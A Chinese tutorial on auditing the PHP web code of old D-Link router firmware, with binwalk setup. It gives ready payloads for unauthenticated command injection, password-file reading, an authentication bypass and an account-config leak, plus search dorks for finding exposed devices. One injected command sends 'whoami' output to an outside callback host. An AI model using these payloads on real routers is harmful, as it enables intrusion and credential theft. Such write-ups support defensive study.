Dlink PHP p308av,D-Link系列路由器漏洞挖掘

最新推荐文章于 2022-09-11 17:00:56 发布
最新推荐文章于 2022-09-11 17:00:56 发布
阅读量863 收藏
点赞数
文章标签: Dlink PHP p308av

参考

源码

binwalk解压固件

kali-linux自带binwalk,编译过程

$ sudo apt-get update

$ sudo apt-get install build-essential autoconf git

# https://github.com/devttys0/binwalk/blob/master/INSTALL.md

$ git clone https://github.com/devttys0/binwalk.git

$ cd binwalk

# python2.7安装

$ sudo python setup.py install

# python2.7手动安装依赖库

$ sudo apt-get install python-lzma

$ sudo apt-get install python-crypto

$ sudo apt-get install libqt4-opengl python-opengl python-qt4 python-qt4-gl python-numpy python-scipy python-pip

$ sudo pip install pyqtgraph

$ sudo apt-get install python-pip

$ sudo pip install capstone

# Install standard extraction utilities(必选)

$ sudo apt-get install mtd-utils gzip bzip2 tar arj lhasa p7zip p7zip-full cabextract cramfsprogs cramfsswap squashfs-tools

# Install sasquatch to extract non-standard SquashFS images(必选)

$ sudo apt-get install zlib1g-dev liblzma-dev liblzo2-dev

$ git clone https://github.com/devttys0/sasquatch

$ (cd sasquatch && ./build.sh)

# Install jefferson to extract JFFS2 file systems(可选)

$ sudo pip install cstruct

$ git clone https://github.com/sviehb/jefferson

$ (cd jefferson && sudo python setup.py install)

# Install ubi_reader to extract UBIFS file systems(可选)

$ sudo apt-get install liblzo2-dev python-lzo

$ git clone https://github.com/jrspruitt/ubi_reader

$ (cd ubi_reader && sudo python setup.py install)

# Install yaffshiv to extract YAFFS file systems(可选)

$ git clone https://github.com/devttys0/yaffshiv

$ (cd yaffshiv && sudo python setup.py install)

# Install unstuff (closed source) to extract StuffIt archive files(可选)

$ wget -O - http://my.smithmicro.com/downloads/files/stuffit520.611linux-i386.tar.gz | tar -zxv

$ sudo cp bin/unstuff /usr/local/bin/

按照上面的命令就可以完整的安装binwalk了,这样就可以解开市面上的大部分固件包。 然后用binwalk -Me 固件包名称解固件,然后我们会得到以下划线开头的名称的文件夹,文件夹里squashfs-root文件夹,就是路由器的完整固件包。

漏洞挖掘

此文章针对历史路由器的web漏洞进行分析,路由器的web文件夹 一般就在suashfs-root/www或者 suashfs-root/htdocs文件夹里。路由器固件所使用的语言一般为 asp,php,cgi,lua 等语言。这里主要进行php的代码审计来挖掘漏洞。

D-Link DIR-645 & DIR-815 命令执行漏洞

Zoomeye dork: DIR-815 or DIR-645

这里以 D-Link DIR-645固件为例,解开固件进入 suashfs-root/htdocs 文件夹。 这个漏洞出现在diagnostic.php文件。直接看代码

HTTP/1.1 200 OK

Content-Type: text/xml

if ($_POST["act"] == "ping")

{

set("/runtime/diagnostic/ping", $_POST["dst"]);

$result = "OK";

}

else if ($_POST["act"] == "pingreport")

{

$result = get("x", "/runtime/diagnostic/ping");

}

echo '<?xml version="1.0"?>\n';

?>

=$result?>

分析代码可以看到,这里没有进行权限认证,所以可以直接绕过登录。继续往下看,set("/runtime/diagnostic/ping", $_POST["dst"]); 这段代码就是造成漏洞的关键代码。参数dst 没有任何过滤直接进入到了 ping的命令执行里,导致任意命令执行漏洞。继续往下看 $result = "OK"; 无论是否执行成功,这里都会显示OK。所以这是一个盲注的命令执行。以此构造payload。

url = 'localhost/diagnostic.php'

data = "act=ping&dst=%26 ping `whoami`.ceye.io%26"

因为是盲注的命令执行,所以这里需要借助一个盲打平台(如:ceye),来验证漏洞是否存在。

补充 这里用act=pingreport可能就有回显了,需要有设备环境调试一下。

D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 任意文件读取(信息泄露)漏洞

Zoomeye dork:DIR-300 or DIR-600

这里以 D-Link DIR-300固件为例,解开固件进入 suashfs-root/www 文件夹。 漏洞出现在/model/__show_info.php文件。

if($REQUIRE_FILE == "var/etc/httpasswd" || $REQUIRE_FILE == "var/etc/hnapasswd")

{

echo "

404 Not Found\n";

echo "

404 Not Found

\n";

}

else

{

if($REQUIRE_FILE!="")

{

require($LOCALE_PATH."/".$REQUIRE_FILE);

}

else

{

echo $m_context;

echo $m_context2;//jana added

if($m_context_next!="")

{

echo $m_context_next;

}

echo "
\n";

if($USE_BUTTON=="1")

{echo "\n"; }

}

}

?>

这里看到已经禁止了$REQUIRE_FILE的参数为var/etc/httpasswd和var/etc/hnapasswd。 这么一看无法获取账号密码。但是我们可以从根路径开始配置httpasswd的路径,就可以绕过这个过滤了。

payload

localhost/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

这里设置REQUIRE_FILE=/var/etc/httpasswd成功绕过上面的if判断,进行任意文件读取。

D-Link DIR-300 & DIR-320 & DIR-615 权限绕过漏洞

Zoomeye dork:DIR-300 or DIR-615

这里以 D-Link DIR-300固件为例,解开固件进入 suashfs-root/www 文件夹

默认情况下,Web界面中的所有页面都需要进行身份验证,但是某些页面(如 登录页面) 必须在认证之前访问。 为了让这些页面不进行认证,他们设置了一个PHP变量NO_NEED_AUTH:

$MY_NAME ="login_fail";

$MY_MSG_FILE=$MY_NAME.".php";

$NO_NEED_AUTH="1";

$NO_SESSION_TIMEOUT="1";

require("/www/model/__html_head.php");

?>

此漏洞触发的原因在于 全局文件 _html_head.php。

/* vi: set sw=4 ts=4: */

if ($NO_NEED_AUTH!="1")

{

/* for POP up login. */

// require("/www/auth/__authenticate_p.php");

// if ($AUTH_RESULT=="401") {exit;}

/* for WEB based login */

require("/www/auth/__authenticate_s.php");

if($AUTH_RESULT=="401") {require("/www/login.php"); exit;}

if($AUTH_RESULT=="full") {require("/www/session_full.php"); exit;}

if($AUTH_RESULT=="timeout") {require("/www/session_timeout.php"); exit;}

$AUTH_GROUP=fread("/var/proc/web/session:".$sid."/user/group");

}

require("/www/model/__lang_msg.php");

?>

这里我们看到 $NO_NEED_AUTH!="1" 如果 $NO_NEED_AUTH 不为 1 则进入身份认证。如果我们把$NO_NEED_AUTH 值设置为 1 那就绕过了认证进行任意操作。

payload

localhost/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

这里AUTH_GROUP=0 表示admin权限

D-Link DIR-645 信息泄露漏洞

Zoomeye dork:DIR-645

D-Link DIR-645 getcfg.php 文件由于过滤不严格导致信息泄露漏洞。

$SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");

TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);

$SERVICE_INDEX = 0;

while ($SERVICE_INDEX < $SERVICE_COUNT)

{

$GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");

TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);

if ($GETCFG_SVC!="")

{

$file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";

/* GETCFG_SVC will be passed to the child process. */

if (isfile($file)=="1") dophp("load", $file);

}

$SERVICE_INDEX++;

}

这里我们可以看到 $GETCFG_SVC 没有任何过滤直接获取了 POST 传递过来的SERVICES的值。如果 $GETCFG_SVC 不为空,则进行文件读取。这里我们就可以读取存储此设备信息的 DEVICE.ACCOUNT.xml.php 文件。

payload:

http://localhost/getcfg.php

post:SERVICES=DEVICE.ACCOUNT

总结

可以发现此篇文章所提及的漏洞都是web领域的常见漏洞,如权限绕过,信息泄露,命令执行等漏洞。由于路由器的安全没有得到足够的重视,此文涉及到的漏洞都是因为对参数过滤不严格所导致的。 路由器的漏洞影响还是很广泛的,在此提醒用户,及时更新路由器固件,以此避免各种入侵事件,以及个人信息的泄露。

做个美梦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP版本 D-Link 动态域名客户端
weixin_33834628的博客
12-29 197
<?php /* * D-Link 动态域名客户端.主域名www.dlinkddns.com 和 www.dlinkddns.com.cn * 首先获取外网IP,若IP没有变化,则结束运行;否则更行域名的IP,若执行错误,则发送EMAIL. * 用到了 CURL 扩展 * 2013.5.28 */ // 获取外网 IP $ipurl ...
不怕死就上这些网站
临时工 Temporary's Space
08-14 10万+
 1. hxxp:///www.dj3344.com 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,现在正飙行,奇坏无比!2. hxxp:///www.qq168.net 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,而且传波病毒,还狠些!现在正在飙行!3. hxxp:///www.777888.com  4. hxxp:///WWW.5dsoft.com  5. hx
www.520520.com
cd8405160的专栏
08-03 2万+
sdfsdfsdffffffffffffffsdfsdfsdfsdfsdfsdfsdfsdf
php实现汉字转拼音代码
chicaohun7473的博客
01-27 612
效果截图: 源代码: <meta http-equiv=content-type content="text/html; charset=UTF-8"> <?php function Pinyin($_String, $_Code="gb2312") {...
DHP-W306AV使用说明
05-29
D-Link DHP-W306AV电力线联网设备杂音少可以放进办公室,常用的网络管理功能更便捷快速的实现网络管理;且主打性能优先的同时并没有牺牲掉用户体验,具备多样的安全控制和轻松的运行维护,简单上手,性价比高。
D-Link 无线路由器静态IP地址分配的方法(图文教程)
10-01
主要介绍了D-Link 无线路由器静态IP地址分配的方法(图文教程)的相关资料,需要的朋友可以参考下
D-link路由器限速思路的分析
10-01
对于一般的网络用户而言,大多采用ADSL拨号上网,类如小型公司、出租屋等环境,而在这类网络环境中使用得最多的是文件共享和下载,像BT、电驴、迅雷、QQ直播、PPStream等,而这些又是很占用网络流量的软件,造成网络...
D-link路由器的常见攻击和对策
10-01
D-link路由器作为网络的核心设备,其安全性至关重要。网络攻击手段多样,针对D-link路由器的攻击主要包括ICMP重定向欺骗、源路由欺骗、内部IP地址盗用以及Smurf攻击。了解并防范这些攻击对于保障网络环境的稳定和...
D-Link宽带路由器通用WEB配置手册
06-02
D-Link宽带路由器通用WEB配置手册
d-link路由器经常出现断线与死机现象的排查及解决方法
10-01
d-link路由器在使用过程中经常出现断线或者死机,究竟是什么情况呢?下面与大家分享下出现断线与死机现象的具体排查及解决方法
解密dlink固件(四)
weixin_43047908的博客
08-17 1252
目录准备工作加密固件发布方案解密过程 准备工作 本次我们要研究的是路由器Dlink-882的固件,下载地址在: ftp://ftp2.dlink.com/PRODUCTS/DIR-882/REVA/,其中的zip文件就是各版本的固件。 加密固件发布方案 解压出来的固件版本从旧到新依次为: FW100B07 --> FW101B02 --> FW104B02 --> FW110B02 --> FW111B01 --> FW120B06 --> FW130B10 其中下
showinfo.php,多个D-Link DIR系列路由器'model/__show_info.php'本地文件泄露漏洞
weixin_35643153的博客
03-11 148
发布日期:2013-12-02更新日期:2013-12-04受影响系统:D-Link DIR-615D-Link DIR-300描述:--------------------------------------------------------------------------------BUGTRAQ ID: 64043D-Link DIR是系列路由器产品。多个D-Link DIR产品在实...
我的网站http://www.xhu.cn/xhu/520/
weixin_30570101的博客
10-30 865
http://www.xhu.cn/xhu/520/ 转载于:https://www.cnblogs.com/jigee/archive/2005/10/30/264760.html
使用8080并口协议驱动NT35510LCD显示屏
djzwwww的博客
09-11 5292
8080并口协议
http://caomaoav.top/index.php,hkfeed-dev/2014-11-04-passwords.txt at master · threatbot/hkfeed-dev ·...
热门推荐
weixin_30838971的博客
03-11 11万+
~!@#$%^&~!@#$%^&*()_-!@#$%^!@#$%^&@#$%^&@#$%&000000000000000000000001xiaoqiang0061qiqi00852880.1230.1234012345012345601234567012345678901280128014703210557wuchenli06102012072752712...
signature=dedda52028ba9cc6699359258f4ed5db,Projekt "HolzWärmePlus" auf dem 12. Internationalen BBE-F...
weixin_34462581的博客
05-30 453
(PresseBox)(Bonn,12-06-28)Der 12. Internationale BBE-Fachkongress für Holzenergie vom 27.-28.09.2012 im Messezentrum Augsburg präsentiert Ihnen dieses Jahr u.a. auch zwei Themenblöcke, die inhaltlich ...
AV防病毒服务器搭建
gohome520的专栏
03-04 4558
支持的代理服务器: Squid(支持ICAP协议) Blue Coat SG Appliance NetApp/Blue Coat NetCache Cisco ACNS Content Engine   软件要求: Perl 5.0以上版本   安装方法: 建立一个kaspersky目录,把安装程序和授权许可文件复制到kaspersky目录中。 rpm -i
Centos 7下安装使用ClamAV
步荀仙的博客
05-28 3775
Centos 7下安装使用ClamAV 安装步骤 1 下载地址 clamav下载地址 选择一个版本下载 2 创建clamav用户和组 # 创建组 groupadd clamav # 创建用户 useradd -g clamav clamav 3 解压、编译工具 # 启动包至opt mv clamav-0.101.2.tar.gz /opt # 切换目录 cd /opt/ # 解压文件...
谷歌为世界造AI,世界却用AI做AV
dandan520520的博客
03-02 1万+
E安全2月23日讯,2015年,谷歌公司发布了其原本内部使用的人工智能算法 TensorFlow工具——此举彻底改变了世界各地人工智能的研究与开发基调。借用谷歌公司首席执行官的说法,这意味着全球开发者将免费以开放、易用的方式利用 TensorFlow 工具进行创造。人工智能技术将由学术领域正式入驻用户个人笔记本电脑。关于 TensorFlowTensorFlow™ 是一个采用数据流图(data f...
使用php2.二维数组的创建及访问· 定义一个名为ar goods的一维数组,一级元素下标分别为 t,computer,network。对应的一级元素分别为日立、三星、海信、创维,戴尔、华硕、鸡基、惠普,华为、t-link、dlink。并至少访问三个一位数组元素。·
最新发布
03-22
好的,这是一个关于 PHP 二维数组的问题。以下是代码示例: ``` $goods = array( 't' => array('日立', '海信', '创维'), 'computer' => array('戴尔', '华硕', '鸡基', '惠普'), 'network' => array('华为', 't-link', 'dlink') ); // 访问一维数组元素 echo $goods['t'][0]; // 输出:日立 echo $goods['computer'][1]; // 输出:华硕 echo $goods['network'][2]; // 输出:dlink ``` 希望这个回答能够帮到你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值